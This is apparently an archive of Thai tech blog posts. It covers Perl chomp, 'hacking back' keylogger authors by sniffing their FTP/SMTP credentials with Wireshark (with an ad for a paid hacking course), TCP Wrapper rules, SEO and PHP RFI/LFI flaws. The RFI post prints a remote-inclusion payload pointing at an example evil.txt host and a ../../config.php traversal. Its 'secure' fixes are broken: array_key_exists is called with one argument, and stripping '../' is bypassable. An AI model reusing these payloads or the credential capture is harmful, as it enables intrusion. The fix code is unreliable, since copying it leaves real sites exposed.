คำสั่ง chomp จะทำการกำจัด ตัวอักษรขึ้นบรรทัดใหม่ ที่ต่อท้าย
คำสั่ง chop จะทำการกำจัด ตัวอักษรตัวสุดท้าย ไม่ว่าจะเป็น White Space
หรือตัวอักษร ซึ่งคำสั่ง Chomp จะปลอดภัยว่า Chop
คำสั่ง chomp สามารถนำมาประยุกต์ใช้งานกับตัวแปร List ได้ โดยคำสั่ง
Chomp จะกระทำากับทุกๆ Elecment ใน List
chomp (@s = (“foo\n”,“bar\n”,“baz\n”));
โดยที่ @s   (“foo”, “bar”, “baz”);

อธิบายการ Hack พวกที่ใช้ Keylogger

2014-01-19T14:37:00.000+07:00

     Keylogger ในปัจจุบันเป็นปัญหา ในระดับที่เรียกได้ว่าอันตรายต่อข้อมูล ของผู้ใช้คอมพิวเตอร์ ในยุคนี้ Keylogger ถือกำเนิดมาจากแนว คิดที่ว่าเอาไว้สอดส่อง พฤติกรรมของลูก หลาน แต่ก็มีการใช้ที่ผิดประสงค์จากเดิมอย่างมาก โดย เอาไปใช้ ในการขโมย ข้อมูลเพื่อทำการโจรกรรมต่างๆ เช่น ขโมย Use&Password ATM หรือ บัตรเครดิต เป็นต้น
ในบทความนี้จะอธิบายการทำงานของ Keylogger คร่าวๆ และ วิธี การตามรอย และ ดัดนิสัย พวกปล่อย Keylogger โดยส่วนใหญ่ เกรียน ที่วางไฟล์ Keylogger นั้นจะคิดว่าตัวเอง แมร่งเจ๋งละ เลยไม่ได้คาดว่ามันจะสามารถย้อนกลับไปทำร้ายตัวเองได้

    ก่อนจะเริ่มต้น ก็ขออธิบายซะหน่อยว่า Keylogger คือ อะไร
Keylogger คือ โปรแกรมที่สามารถจดจำคีย์ (Key) ที่เรากดลงไปจาก Keyboard นั่นเอง   เช่น เวลาที่เราเล่น facebook หรือเกมส์ต่างๆ เมื่อมีการกดลงบน Keyboard โปรแกรมพวกนี้จะจดจำคีย์ พวกนั้นไว้ แล้วโปรแกรมมันก็จะเก็บ Id และ password ทั้งหมดไว้ แล้วจะส่งไปยังผู้ที่ฝังโปรแกรมไว้ อาจจะส่งทางเมลล์ หรือ ftp ก็ได้ และนี่จึงเป็นสาเหตุหลักๆ ของการโดน Hack โดย ปกติแล้ว Keylogger จะส่งข้อมูลออกจากเครื่อง ในทุก 5 หรือ 10 นาที จากนั้นมันก็จะหยุดส่งข้อมูล

    Keylogger นั้นจะส่งข้อมูลไปในรูปแบบของ E-mail หรือ FTP ตามแต่ ผู้สร้างจะ set มันไว้ เราจะใช้ในส่วนตรงนี้ในการ Hack คืนหรือหาว่า IP ที่ดักเรามากจากใหน เมื่อเราได้ IP มาแล้ว ถ้าเป็นผม เมื่อเงินในกระเป๋า ผมหมด ผมก็จะเอาหลักฐานตรงนั้น ไปแจ้งความดำเนินคดี เรียกร้องเอาค่าเสียหาย ไป นั่งจิบเบียร์ เย็นๆเล่น หรือ อาจจะตามไปถึงบ้านแล้วเอาตะเกียบ ไปดีดใข่

    โปรแกรมที่จะใช้ในการ Hack ย้อนทางคือ Wireshark โปรแกรม Wireshark นั้นคือโปรแกรมที่มีไว้ดักจับ Packet ระหว่าง Client ไป Server โปรแกรมนี้ สามารถจับ Packet ได้หลายๆ Protocal เช่นพวก TCP,UDP,SMTP,FTP,HTTP ฯลฯ เราจะใช้โปรแกรมนี้สำหรับ ดัก Packet ที่ Keylogger ส่งข้อมูลออกจาก เครื่องไปหา เซิฟเวอร์ หรือ E-mail ของผู้ที่สร้าง Keylogger ขั้นตอนแรกคือ ติดตั้ง โปรแกรม Wireshark ใน VMware ซึ่งหาได้จาก Google ซึ่งหาได้ทุกอย่าง
ต่อมาให้ เปิด Windows ใน VMware เปิดโปรแกรม Wireshark ที่เราได้ ติดตั้งเอาไว้ จากนั้น กด Capture เลือก Interface.. จากนั้นเลือก Device ที่เราจะ Sniff เพื่อดูรหัสผ่าน FTP ของคนที่สร้าง Keylogger

เมื่อ เลือกแล้ว จากนั้น ตรงช่อง Filter: ให้พิมพ์ ftp แล้วรอประมาณ 20 - 30 นาที ถ้าเห็น Protocal FTP ขึ้น ก็แสดงว่า Keylogger ตัวนี้ส่งข้อมูล ผ่าน Port 21 ซึ่งเป็น Protocal FTP

กรณีที่ไม่เจอ Protocal FTP
   ให้เปลี่ยนจาก ftp เป็น smtp จากนั้นก็รอ 20-30 นาทีเช่นเดิม แค่นี้เราก็ได้ E-mali&Password ของ Keylogger ตัวนี้มา

อธิบายต่อ ว่า FTP คือ อะไร และ SMTP คืออะไร

   SMTP ย่อมาจาก Simple Mail Transfer Protocol คือ Protocol แบบ TCP/IP ที่ใช้ในการส่ง E-Mail ในเครือข่ายอินเทอร์เน็ต ไปยังเครื่องบริการอื่น ๆ ซี่งสามารถส่งเมล์ไปยังผู้ใช้ได้ทั่วโลก มีข้อจำกัดในเรื่องของความสามารถในการส่ง e-mail ว่ามันสามารถทำได้แบบเป็นคิวเท่านั้น และ SMTP ส่วนใหญ่จะไม่ยอมให้คนนอกองค์กร หรือ IP ที่อยู่นอกองค์กรใช้งาน SMTP

    FTP ย่อมาจาก File Transfer Protocol คือ โปรโตคอลเครือข่ายชนิดหนึ่ง ถูกนำใช้ในการถ่ายโอนไฟล์ ระหว่างเครื่องคอมพิวเตอร์ อย่างการถ่ายโอนไฟล์ระหว่าง ไคลเอนต์ (client) กับเครื่องคอมพิวเตอร์ที่เป็นแม่ข่าย เรียกว่า โฮสติง (hosting) หรือ เซิร์ฟเวอร์ ซึ่งทำให้การถ่ายโอนไฟล์ง่ายและปลอดภัยในการแลกเปลี่ยนไฟล์ผ่านอินเตอร์เน็ต การใช้ FTP ที่พบบ่อยสุด ก็เช่น การดาวน์โหลดไฟล์จากอินเทอร์เน็ต ความสามารถในการถ่ายโอนไฟล์ ทำให้ FTP เป็นสิ่งจำเป็นสำหรับทุกคนที่สร้างเว็บเพจ ทั้งมือสมัครเล่นและมืออาชีพ โดยที่การติดต่อกันทาง FTP เราจะต้องติดต่อกันทาง Port 21 ซึ่งก่อนที่จะเข้าใช้งานได้นั้น จะต้องเป็นสมาชิกและมีชื่อผู้เข้าใช้ (User) และ รหัสผู้เข้าใช้ (password) ก่อน และโปรแกรมสำหรับติดต่อกับแม่ข่าย (server) ส่วนมากจะใช้โปรแกรมสำเร็จรูป เช่น โปรแกรม Filezilla,CuteFTP หรือ WSFTP ในการติดต่อ เป็นต้น

FTP แบ่งเป็น 2 ส่วน

1. FTP server เป็นโปรแกรมที่ถูกติดตั้งไว้ที่เครื่องเซิฟเวอร์ ทำหน้าที่ให้บริการ FTP หากมีการเชื่อมต่อจากไคลแอนเข้าไป

2. FTP client เป็นโปรแกรม FTP ที่ถูกติดตั้งในเครื่องคอมพิวเตอร์ของ user ทั่วๆไป ทำหน้าที่เชื่อมต่อไปยัง FTP server และทำการอัพโหลด ,ดาวน์โหลดไฟล์ หรือ จะสั่งแก้ไขชื่อไฟล์, ลบไฟล์ และเคลื่อนย้ายไฟล์ก็ได้เช่นกัน

ความสำคัญของ FTP

     โดยปกติเมื่อเราต้องการทำเว็บไซต์ไม่ว่าด้วยจุดประสงค์ใดก็ตาม สิ่งที่เราจะต้องนึกถึงและขาดไม่ได้คือ Hosting หรือ Server ซึ่งในปัจจุบันมีผู้ให้บริการอยู่เป็นจำนวนมาก การที่เว็บไซต์ของเราสามารถให้บริการได้ตลอด 24 ชั่วโมง โดยไม่มีหยุดนั้น ก็เพราะ Hosting ไม่เคยปิดนั่นเอง ส่วนการสร้างเว็บไซต์เกิดจากการเขียน Code โปรแกรม ไม่ว่าจะเขียนด้วยภาษา HTML , PHP , ASP , ฯลฯ ล้วนแล้วแต่ต้องนำไฟล์ที่เราเขียนเสร็จเรียบร้อยไปใส่บน Hosting เพื่อสามารถให้บริการได้ตลอด 24 ชั่วโมง 365 วัน แต่ด้วยหนทางที่อยู่ไกลกันระหว่างเรากับ Hosting ที่เราขอใช้บริการไว้ เราจึงต้องใช้เทคโนโลยีของคอมพิวเตอร์ ในการโอนย้ายไฟล์ระหว่างเครื่องคอมพิวเตอร์ของเรา กับ Hosting ซึ่งเทคโนโลยีนั้นคือ FTP นั่นเอง

*เรื่อง Hack พวก Keylogger และ Trojan ผมเอาไว้ในคอร์ด Hack ราคา 1500 บาท ดูรายระเอียดจากลิงค์ด้านล่าง
http://kiss-hack.blogspot.com/2013/08/hack-1-kiss-hack.html

เครดิต : BaNNeD Kiss-Hack.blogspot.com
จะก๊อปกรุณาให้เครดิตด้วย ถ้าไม่อยากโดน LC ในภายหลัง

TCP Wrapper คืออะไร?

2013-12-16T10:13:00.000+07:00

TCP Wrapper จัดว่าเป็นโปรแกรมที่ช่วยในด้านความปลอดภัยที่มีประโยชน์มาก สามารถ
ลดความเสี่ยงในการที่เครื่องของท่านจะถูกบุกรุกได้อย่างมีประสิทธิภาพ TCP-Wrapper มีหน้าที่
ตรวจสอบคำขอใช้บริการงานต่างๆ ที่เข้ามาในเครื่องของเรา และพิจารณาว่าจะให้บริการหรือไม่
ตามคำสั่งที่เราระบุไว้

TCP Wrapper คืออะไร?

TCP Wrapper จะทำการตรวจสอบว่าผู้ใช้จากเครื่องอื่นๆ สามารถมาใช้บริการต่างๆ ของ
เครื่องเราหรือไม่ โดยจะทำงานภายใต้ Inetd (Internet Daemon)
การที่เครื่องเราให้บริการงานต่างๆ เราจะเรียกว่าเป็น Server ของบริการนั้นๆ เช่น FTP
Server การที่จะเป็น Server เครื่องของเราจะต้องมีโปรแกรม ซึ่งทำหน้าที่คอยฟัง (listen) คำขอ
ใช้บริการจากเครื่องลูกข่าย (Client) เมื่อมีคำขอมาแล้ว ก็จะเริ่มให้บริการจนสิ้นสุด จากนั้นก็จะวน
กลับไปอยู่ในโหมด listen ต่อไป

โปรแกรมที่ทำหน้าที่เป็น Server (บางทีเรียกว่า daemon) ลักษณะการเขียนส่วนมากจะ
เขียนเป็นชื่อโปรโตคอลที่ให้บริการ แล้วตามด้วยตัว “d” (ย่อมาจาก daemon) เช่น โปรแกรมที่ทำ
หน้าที่ HTTP Server เราก็จะเรียกว่า httpd และโปรแกรมที่ทำหน้าที่ FTP Server เราก็จะ
เรียกว่า ftpd เป็นต้น

Server จะทำงานได้ 2 โหมด คือโหมด Stand-alone และแบบผ่าน Inetd ในแบบ Standalone
โปรแกรมที่ทำหน้าที่เป็น Server นั้น จะถูกเรียกให้ทำงานทันทีและจะค้างอยู่ตลอด (อยู่ใน
listen mode ซึ่งสามารถดูได้โดยการใช้คำสั่ง ps ax หรือ ps –ef) ถึงยังไม่มีคำขอใช้บริการเข้ามา
ส่วนแบบ Inetd นั้น ตัว Inetd เองจะถูกเรียกให้ทำงานทันที และค้างอยู่ตลอด แต่ Daemon ที่ทำงานใต้ Inetd จะไม่ถูกเรียกให้ทำงาน จนกว่าจะมีคำขอใช้บริการ Inetd จะรับคำขอใช้บริการ
และดูว่าเป็นคำขอสำหรับ Server ตัวใด หลังจากนั้นก็จะทำการเรียกโปรแกรม Server นั้นให้
ทำงาน เมื่อทำงานเสร็จสิ้นแล้วก็จะปิดการทำงานไป เหลือแต่ Inetd โปรแกรมเดียว ที่ยังคงรับคำ
ขอต่อไป (ในแบบ listen mode)

   จะเห็นว่าในแบบ Stand-alone นั้น แต่ละ Server จะถูกเรียกให้ทำงานและค้างไว้ ซึ่งเป็น
การสิ้นเปลืองทรัพยากรของเครื่อง แต่หากมีคำขอใช้บริการก็สามารถทำงานได้ทันที แบบ Inetd
จะมีเพียง Inetd อันเดียวเท่านั้น ที่ถูกเรียกให้ทำงานค้างไว้ เป็นการประหยัดทรัพยากรของระบบ
แต่หากมีคำขอใช้บริการก็ต้องเสียเวลาในการเรียกใช้ Server แต่ละตัว แล้วก็ปิดไป และเปิดใหม่
เมื่อมีคำขอมาอีก

   แบบ Stand-alone จะเหมาะกับ Server ที่ให้บริการงานที่มีคำขอใช้บริการมาก ส่วน Inetd
ก็จะเหมาะกับบริการที่มีผู้ขอใช้ไม่มากนัก ตัวอย่างเช่น หากเครื่องของเราทำหน้าที่หลักเป็น Web
Server เราก็ควรให้ httpd ทำงานในแบบ Stand-alone ส่วน telnetd, ftpd มีผู้ใช้ไม่บ่อยนัก ก็ให้
อยู่ใต้ Inetd

การที่เราจะให้ Server ใดทำงานภายใต้ Inetd เราจะต้องใส่ไว้ในไฟล์ /etc/inetd.conf
ตัวอย่างบรรทัดในไฟล์ /etc/inetd.conf สำหรับ FTP, TELNET, POP3 Server มีดังนี้

ftp        stream      tcp        nowait      root      /usr/sbin/tcpd         wu.ftpd -l -i -a
telnet    stream      tcp        nowait    root     /usr/sbin/tcpd          in.telnetd
pop3     stream      tcp       nowait       root    /usr/sbin/in.pop3d    in.pop3d

   ในบรรทัดที่ 3 (pop3) นั้น จะเห็นว่าใน Field ที่ 6 และ 7 ต่างชี้ไปที่ /usr/sbin/in.pop3d
กรณีนี้ถ้ามีคำขอใช้บริการ pop3 inetd ก็จะทำการเรียกโปรแกรม /usr/sbin/in.pop3d นั่นเอง ส่วน
ในบรรทัดของ ftp และ telnet ใน Field ที่ 6 จะเป็น /usr/sbin/tcpd ซึ่งคือตัวโปรแกรม TCPWrapper
นั่นเอง กรณีนี้เวลามีผู้ขอใช้บริการ ftp หรือ telnet มายังเครื่องของเรา Inetd จะเรียก
โปรแกรม tcpd (TCP Wrapper) ก่อน ซึ่งจะทำการตรวจสอบว่าผู้ใช้มีสิทธิ์ที่จะใช้บริการของเรา
หรือไม่ ถ้ามีก็จะทำการเรียก /usr/sbin/wu.ftpd หรือ /usr/sbin/in.telnetd ต่อไป
ไฟล์ที่ TCP-Wrapper ใช้สำหรับเก็บเงื่อนไขสิทธิในการใช้บริการ มีอยู่ 2 ไฟล์ คือ /etc/
hosts.allow และ /etc/hosts.deny

• hosts.allow เป็นไฟล์ที่ใช้สำหรับแสดงรายละเอียดเงื่อนไขต่างๆ ที่ตั้งไว้ว่า อนุญาต
ให้ใคร (จาก IP หรือ host) เข้ามาทำงานกับเครื่องของเราได้บ้าง

• hosts.deny เป็นไฟล์ที่ใช้สำหรับแสดงรายละเอียดเงื่อนไขต่างๆ ที่ตั้งไว้ว่า ไม่
อนุญาตให้ใคร (จาก IP หรือ host) เข้ามาทำงานกับเครื่องของเราได้บ้าง
โดยมีรูปแบบการตั้งค่าดังนี้

                 <รายชื่อบริการ>: <เงื่อนไขในการให้บริการ>

รายชื่อบริการ คือชื่อของ application หรือ service ต่างๆ ของ Server นั้นๆ ที่เรา
กำหนดให้มันทำงานภายใต้ Inetd เช่น ftpd, fingerd เป็นต้น (ตรงกับใน Field แรก ของ
/etc/inetd.conf ) ถ้าเป็นคำว่า ALL หมายความว่า ทุกบริการที่มีปรากฏใน Inetd
เงื่อนไขในการให้บริการ อาจเป็นรายชื่อของโดเมนเนม เช่น utcc.ac.th, loxinfo.co.th,
nectec.or.th

หรือ IP Address เช่น 203.150.154.1, 164.115.115. เป็นต้น

ในการกำหนดค่าต่างๆ ในไฟล์ hosts.allow และ hosts.deny จะใช้รูปแบบข้างต้น ในไฟล์
hosts.allow จะหมายถึงการอนุญาต ในไฟล์ hosts.deny จะหมายถึงการปฏิเสธ เราสามารถสร้าง
เงื่อนไขต่างๆ ได้หลายเงื่อนไขภายในไฟล์เดียวกัน แต่ต้องไม่ขัดแย้งกันทั้งในไฟล์เดียวกัน และ
ระหว่างไฟล์ hosts.allow กับ hosts.deny ด้วย (ความจริง เราใช้แค่ไฟล์ใดไฟล์หนึ่งก็เพียงพอ ถ้า
บริการของเรา ส่วนใหญ่ปิดเปิดให้กับบางคนเท่านั้น ก็ควรใช้ hosts.deny แต่ถ้าบริการของเรา
ส่วนใหญ่เปิดปิดสำหรับบางคนเท่านั้น ก็ควรใช้ hosts.allow) ตัวอย่างดังนี้
อนุญาตให้ใช้งานได้ทุกอย่างจากทุกเครื่อง

   ที่ไฟล์                      hosts.allow ALL : ALL

   อนุญาตให้ใช้งานได้ทุกอย่างจากทุกเครื่อง ยกเว้นจาก IP 202.28.8.5

    ที่ไฟล์                     hosts.allow ALL : ALL EXCEPT 202.28.8.5

อนุญาตให้ใช้งานได้ทุกอย่าง ยกเว้น ftp จากทุกเครื่อง ยกเว้นจาก domain 202.28.8

    ที่ไฟล์                     hosts.allow ALL EXCEPT in.ftpd : ALL EXCEPT 202.28.8.

ไม่อนุญาตให้ใช้งานทุกอย่าง จากเฉพาะ IP 202.28.8.15 กับ 202.28.9.6

    ที่ไฟล์    hosts.deny ALL : 202.28.8.15, 202.28.9.6

ไม่อนุญาต ให้ใช้งานทุกอย่าง ยกเว้น finger จากทุกเครื่องบน domain nectec.or.th

    ที่ไฟล์                    hosts.deny ALL EXCEPT in.fingerd : .nectec.or.th

(โปรดสังเกตเครื่องหมายจุด หน้า nectec.or.th)
ไม่อนุญาตให้ใช้งานทุกอย่าง ยกเว้น ftp จากทุกเครื่องบน domain nectec.or.th และไม่
อนุญาตให้เครื่องทุกเครื่องเข้ามาในเครือข่าย ยกเว้นเครื่องภายใน domain utcc.ac.th

     ที่ไฟล์    hosts.deny ALL EXCEPT wu.ftpd : .nectec.or.th
   ALL : ALL EXCEPT .utcc.ac.th

โปรดสังเกตคำว่า wu.ftpd นำมาจาก Field ที่ 6 ของบรรทัดของ ftpd ใน /etc/inetd.conf
ในเครื่องของท่านอาจแตกต่างออกไป

สำหรับเครื่องที่ใช้ซอฟต์แวร์ Linux-SIS เวอร์ชัน 2.0 ขึ้นไปจะมีการติดตั้ง TCP Wrapper
มาให้เรียบร้อยแล้วโดยมีข้อความในไฟล์ทั้งสองดังนี้

          /etc/hosts.allow -ไม่มีข้อความ-

        /etc/hosts.deny in.telnetd:                 ALL EXCEPT 192.168.1.
                                                              in.ftpd: ALL EXCEPT 192.168.1.

หมายความว่า ไม่อนุญาตให้ทำการ telnet หรือจากเครื่องใดๆ ยกเว้นเครื่องที่มี IP Address
ขึ้นต้นด้วย 192.168.1 (เช่น 192.168.1.1, 192.168.1.2, ...)

ท่านสามารถเพิ่มเติมแก้ไขไฟล์เหล่านี้ได้ตามความต้องการของท่าน (โปรดระวัง ไม่ควร
อนุญาตให้ผู้ใช้ใดๆ สามารถทำการ telnet/ftp มายังเครื่องเราได้โดยไม่จำเป็นเป็นอันขาด)

ระบบ Unix สมัยใหม่ส่วนใหญ่ จะมีการติดตั้ง TCP-Wrapper มาให้เรียบร้อยแล้ว ท่าน
สามารถตรวจสอบโดยการค้นหาว่ามีไฟล์ชื่อ tcpd (ตามปกติจะอยู่ใน /usr/sbin) หรือไม่ ถ้ามีอยู่
แล้ว ท่านก็เพียงแก้ไขไฟล์ /etc/inetd.conf, /etc/hosts.allow, /etc/hosts.deny ให้เป็นตามต้องการ
หากพบว่ายังไม่มี ท่านสามารถดาวน์โหลดต้นฉบับของซอฟต์แวร์ TCP-Wrapper ได้ที่

ftp://ftp .win.tue.nl/pub/security/

หลักของการทำ SEO

2013-11-29T22:05:00.000+07:00

ผู้อ่านหลาย ๆ คนเริ่มรู้แล้วว่า SEO คืออะไร และมีความสำคัญอย่างไร (หากเป็นผู้อ่านที่ไม่มีความรู้พื้นฐานอะไรเลย ผมแนะนำให้อ่านบทความเดิมตามลิ้งค์เลยนะครับ) แต่สำหรับผู้อ่านที่เริ่มเข้าใจถึงความสำคัญของ SEO แล้ว อาจะมีความสงสัยว่าการทำ SEO นั้นเค้าทำกันยังไง ซึ่งนั่นก็เป็นอะไรที่ผมกำลังจะอธิบายในบทความนี้นั่นเอง แต่คงไม่ได้ลงไปถึงรายละเอียดที่ลึกมาก เอาเพียงแค่ภาพรวมก่อนดีกว่า ไม่งั้นอาจจะจำกันไม่หมดหรือไม่ก็งงกันไปใหญ่ได้เลยทีเดียวเชียว

วิธีการปรับแต่ง SEO ถูกแบ่งแยกออกเป็นสองส่วนหลัก ๆ คือ SEO onpage และ SEO offpage ซึ่งทั้งสองแบบนี้ถ้าจะให้พูดกันง่าย ๆ ก็คือ การปรับแต่ง SEO โดยอาศัยปัจจัยภายใน (On-page) และปัจจัยภายนอก (Off-page) นั่นเอง… คำพวกนี้ หลาย ๆ ท่านอาจจะเคยฟังผ่านมาแล้ว แต่ยังไม่เข้าใจ ว่ามันคืออะไรกันแน่ หากเป็นแบบนั้น ก็ลองมาดูคำอธิบายที่ละเอียดขึ้นมาอีกหน่อยกันดีกว่า

การปรับแต่ง SEO โดยอาศัยปัจจัยภายใน (SEO On-page) ก็คือการใช้ทุกสรรพสิ่งที่เราสามารถ Control ได้ในเว็บไซต์ของเราเองมาช่วยให้อันดับ (Ranking) ของผลลัพธ์ในการ search ดีขึ้นนั่นเอง ผู่อ่านอ่านหลายท่าน “อาจจะถามว่าแล้วอะไรบ้างล่ะที่เรา controlได้ในเว็บไซต์เรา?” ซึ่งคำตอบของคำถามนั้่นก็ตัวอย่างเช่น เนื้อหาภายในเว็บ, ชื่อหัวเรื่องของหน้าเว็บ (title tag), คำอธิบายหน้าเว็บ (meta description ถึงในปัจจุบันไม่มีผลกับอันดับแล้ว แต่มีผลกับการ user ในการ click เลือกผลลัพธ์), การใช้ link ที่เชื่อมไปยังหน้าอื่น ๆ ภายในเว็บเรา internal linking), ชื่อโดเมน (domain name), ชื่อไฟล์ (file name), และอื่น ๆ ที่เราสามารถปรับแต่งได้เอง ในเว็บไซต์ของเรา

ในทางตรงกันข้าม การปรับแต่ง SEO Off-page ก็คือการอาศัยปัจจัยภายนอกมาทำให้อันดับของเว็บเราดีขึ้น เช่น การเพิ่ม link จากเว็บอื่น ๆ ให้ link กลับมาหาเรา (link building) นั่นเอง ซึ่งมีทั้งการทำแบบที่ถูกต้องตามหลักคำแนะนำของ Search Engine (White Hat) และการอาศัยเทคนิคต่าง ๆ ที่ได้ผลเร็ว แต่ไม่ค่อยจะถูกหลักที่ Search Engine อยากให้เป็น (Black Hat) มาช่วยการจัดอันดับ … ในสถานการณ์ปัจจุบันตรงส่วนของการหา back link นี้ถูกมองไปถึงการทำ Online Marketing ด้วย เพราะ Online Marketing จะทำให้เราได้ backlink และ traffic มากขึ้น แต่จะดีขนาดไหนนั้นก็ต้องอยู่กับความเทพ ของคุณเองด้วย

ก็คงจบเรื่อง SEO on-page และ SEO off-page ไว้ตรงนี้ ส่วนรายละเอียดแบบลงลึกของแต่ละชนิด ไว้ค่อยว่ากันในบทถัด ๆ ไปดีกว่า แต่ยังไงตอนนี้หากใครพูดถึง SEO on-page และ off-page ให้คุณได้ยินอีก คุณก็คงจะไม่งงอีกแล้

Backlink คืออะไร แล้วมันสำคัญยังไง

BackLink คือ Link ที่วิ่งเข้ามาหาเว็บใดก็ตาม เว็บใดเว็บหนึ่ง

BackLink สำคัญอย่างไร ? เรื่องนี้ผมคืออธิบายนะครับว่า ปัจจัยหลักเลยที่จะทำให้เว็บไซด์เราดังขึ้นมา และ ติดอันดับนั้น ใน Search Engine ค่ายต่างๆ โดยเฉพาะ Google สิ่งสำคัญอย่างนึง ก็คือการทำ BackLink นี่แหละครับ โดย Bot ของ Search Engine ทั้งหลายจะจัดอันดับ เพื่อให้
คะแนน และ คุณภาพของเว็บไซด์จาก BackLink จำนวมาก นั้นแหละครับ แต่อย่างที่ผมเคยบอกไว้ในบทความก่อนๆ คือ BackLink ของคุณต้อง
เป็น BackLink ที่มีคุณภาพด้วยเช่นกัน อืม..ประมาณว่า สมมุติคุณทำเว็บเกี่ยวกับการเรียนการสอน แต่กลับมามี link มาจากเว็บรวมรูป Search Engine ก็จะมองว่าเราทำ Spam BackLink เพราะมันดูไม่เป็นธรรมชาติ เราควรมี BackLink ที่มาจากเว็บที่มีเนื้อหาสอดคล้องเก็บเว็บของเรา จะทำให้ BackLink เป็น BackLink ที่เป็นธรรมชาติ

BackLink ต้องห้าม ข้อนี้สำคัญมากนะครับ การที่มี BackLink มากๆ นั้นเป็นสิ่งที่ดีก็จริงอยู่แต่หากคุณมี BackLink จากเว็บที่ไม่ควรมีแล้วล่ะก็
ต่อให้เป็นเว็บไซด์ที่มีเนื้อหาสอดคล้องกับเว็บของเราแค่ไหนก็ตาม แววโดนแบนก็จะมาที่เว็บคุณแน่นอน แล้วเว็บอะไรล่ะที่ห้ามไปมี BackLink
ด้วย เว็บที่เราห้ามไปมี BackLink ด้วยอย่างเด็ดขาด ก็คือเว็บที่ถูกแบนจาก Search Engine นั่นเอง แล้วจะรู้ได้อย่างไรว่าเว็บที่จะมาแลก link กับเรา หรือเว็บที่เราจะโพสต่อไปนั้นเป็นเว็บที่ถูก แบน รึปล่าว ? เราสามารถ Check ได้ครับ โดยเข้าไปที่ http://www.isbanned.com/ แล้ว
ลองพิมพ์ URL ของเว็บที่ท่านกำลังจะคบค้าสมาคมด้วยดูนะครับว่าควรจะ คบกับเว็บไซด์เหล่านั้นด้วยดีมั้ย และสำหรับคนที่ทำ BlackLink มาเยอะแล้ว แลก link มาเต็มเว็บแล้วให้เข้า http://www.bad-neighborhood.com/text-link-tool.htm เลยครับเพื่อเช็คทีเดียวทั้งเว็บ ว่าเราไปมีเว็บอะไรรึเปล่าที่โดนแบนไม้ควรคบค้าสมาคมด้วย จะได้รีบเอาออกอย่างทันถ่วงทีนะครับ

อย่างไรก็ดี การหมั่นอัพเดทเว็บไซด์บ่อยๆ ด้วยเนื่้อหาของท่านเองไม่ก๊อบใคร Unique Content นั่นก็เป็นสิ่งที่สำคัญที่สุดอยู่ดีครับ เพราะว่า แม้เราจะมี BackLink เยอะแค่ไหนก็ตามหากคนคลิกเข้ามาพบเนื้อหาไม่น่าสนใจ และ ไม่อัพเดท บ่อยๆ คนก็ไม่เข้ามาอยู่ดีครับ ควรหมั้นอัพเดท Content ให้สอดคล้องกับ BackLink ที่เป็นธรรมชาติ แล้วเว็บคุณก็จะมีอันดับที่ดีขึ้นเองครับ

ขอขอบคุณบทความจาก
http://www.sciartseo.com/
http://seo.clisk.co.th

การ Hack ด้วยช่องโหว่ RFI (Remote File Inclusion)

2013-11-23T17:04:00.000+07:00

ช่องโหว่ RFI(Remote File Inclusion) hacking

RFI(Remote File Inclusion) คือ ช่องโหว่ชนิดนึงที่เปิดทางให้ hacker โจมเว็บไซต์ได้ ด้วยการดึงไฟล์จากข้างนอกเว็บ เข้ามารันในเว็บของคุณ

LFI(Local File Inclusion) คือ ช่องโหว่ชนิดนึงที่เปิดทางให้ hacker ดึงไฟล์อื่นๆที่อยู่ในเว็บไชต์มารัน หรือดู (อาทิเช่น ไฟล์ config หรือไฟล์เก็บ password ต่างๆ)

ทั้งนี้รูรั่วทั้งสองเกิดการความสะเพร่า หรือไม่ใส่ใจในการกรอง input ของตัวผู้เขียนสคริปเอง

ว่ากันไปตามเหตและผล ผลที่เรารู้แล้วแน่ชัดคือข้อมูลรั่วไหล หรือเว็บโดน hack งั้นมาดู สาเหตุกันดีกว่า

สาเหตุที่ทำให้เกิด รูรั่ว RFI / LFI
จริงๆก็เกริ่นไว้ตั้งแต่ตอนต้นล่ะครับว่าเกิดจากความสะเพร่า หรือไม่ใส่ใจของคนเขียนสคริปเอง

ตัวอย่างโค๊ดที่ทำให้เกิดช่องโหว่ RFI และ LFI

view sourceprint?
<? include($_GET['page']);?>
แล้ว hack ก็ป้อน input เข้ามาเป็น index.php?page=http://example.com/evil.txt
เมื่อดูจาก php แล้วก็จะ ตู้มกลายเป็นโกโก้ครั้นกันเลย

วิธีป้องไม่ให้เกิดรูรั่ว RFI / LFI
ก็คือการกรอง input ($_GET,$_POST,$_REQUEST,$_COOKIE) ทุกทางที่ user สามารถส่งมาได้ จริงๆแล้วหลักปฏิบัติที่ดีในการเขียนสคริป ควรจะกรองก่อนทุกครั้งก่อนที่จะนำไปทำอะไรต่อ
ในกรณีนี้ ผมแนะนำว่าให้ กำหนด Array ไฟล์ที่จะ include เข้ามาด้วย key => file จะปลอดที่สุดครับ รูรั่วนี้ก็จะหมดไป

view sourceprint?
$allow = array(
0 => 'page-0.php',
1 => 'page-1.php',
'test' => 'page-test.php',
'sub' => 'sub.php',
);
if(array_key_exists($_GET['page']))
{
include($allow[$_GET['page']]);
}
โดนลิสต์ array แบบนี้ ปัญหาทั้ง RFI และ LFI ก็จะหมดไปครับ
สำหรับไฟล์ปริมาณมาก(กรณีที่ไม่รู้ว่าจะ ดึงไฟล์ไหนเข้ามา) ผมจะใช้ realpath เป็นตัวจัดการ หรือตัด ../ และ ./ ออกเพื่อป้องกัน LFI
วิธีการมีมากมายแล้วแต่จะจิตนาการ หรือตามถนัด หรือตามสตาย์ (กังนัมสตายล์ ไม่เกี่ยวนะ 555) สำหรับใครที่คิดไม่ออก ผมยกตัวอย่างคร่าวๆ สักสองสามวิธีก็แล้วกันครับ

Method 1: str_replace(‘../’,”,$page);
ตัด ../ ออกด้วย

view sourceprint?
$page = urldecode($_GET['page']); //decode ก่อนชั้นนึง
$page = str_replace(array('../','./'),'',$page);
สมมุติ input มาประมาณว่า

view sourceprint?
index.php?page=../../config.php
$page ก็จะเท่ากับ config.php โดนตัด ../ ออกไป

Method 2: realpath
วิธีที่2 ใช้ realpath ซึ่ง realpath จะ แปลง ./ หรือ ../ ให้กลายเป็น absolute path (full path ยาวตั้งแต่ C:/ กรณีวินโดว์)และจะ return false; กลับมาถ้าไฟล์นั้นไม่มีอยู่จริง

view sourceprint?
//สมมติว่า $_GET['page'] = '../../test.php';
$page = realpath($_GET['page']); //แปลงให้เป็น absolute
$incDir = realpath('my-dir'); //แปลงfolder ที่จะ include เป็น absolute
if(empty($page) || strpos($page,$incDir)!==0) //เช็คดูว่าอยู่ในโฟลเดอร์เดียวกันหรือเปล่า
{
die('404'); //stop script
}
include($page);
Method 3: filename
วิธีที่ 3 หั่นเอามาเฉพาะ filename

view sourceprint?
$page = explode('/',$_GET['page']); //หั่น path ออกมาเป็น array
